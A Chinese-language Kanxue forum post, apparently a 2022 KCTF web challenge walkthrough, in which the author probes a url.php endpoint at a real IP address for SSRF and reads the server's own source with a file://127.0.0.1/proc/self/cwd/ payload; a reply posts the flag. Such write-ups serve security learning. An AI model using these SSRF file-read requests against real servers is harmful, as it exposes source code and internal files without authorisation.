[原创]2022 KCTF-WEB 出题思路-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

香草0x00

2022-5-1 20:30

10137

打开首页显示(我打开的是测试页面)

查看源码得到两个个链接

http://101.89.140.207:8044/phpinfo.php phpinfo的信息，暂时不知道有什么用

http://101.89.140.207:8044/url.php?url=https://ctf.pediy.com/upload/team/762/team236762.png

感觉是请求了图片显示在页面，猜测可能有SSRF漏洞

测试http://101.89.140.207:8044/url.php?url=https://www.baidu.com

返回error,猜测可能限制了域名

测试http://101.89.140.207:8044/url.php?url=127.0.0.1/index.php

返回host is null,搞不清楚什么情况，试试读文件

http://101.89.140.207:8044/url.php?url=file:///proc/self/cwd/url.php

返回host is null

通过链接：view-source:http://101.89.140.207:8044/url.php?url=file://127.0.0.1/proc/self/cwd/url.php

成功读取到代码

原来是使用了curl,同时发现了一个新的被注释掉的地址http://123.57.254.42/flag.php

最后于 2022-5-17 12:04 被kanxue编辑，原因：

收藏・1

免费・4

支持

最新回复 (1)
kanxue 雪币： 47147 活跃值： (20455) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 2 楼第四题飞蛾扑火 flag{xxx_999()xx*@eeEEE} 最后于 2022-5-17 12:01 被kanxue编辑，原因： 2022-5-9 12:03 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

香草0x00

发帖

回帖

RANK

他的文章

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (1)
kanxue 雪币： 47147 活跃值： (20455) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 541 关注私信	kanxue 8 2 楼第四题飞蛾扑火 flag{xxx_999()xx*@eeEEE} 最后于 2022-5-17 12:01 被kanxue编辑，原因： 2022-5-9 12:03 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复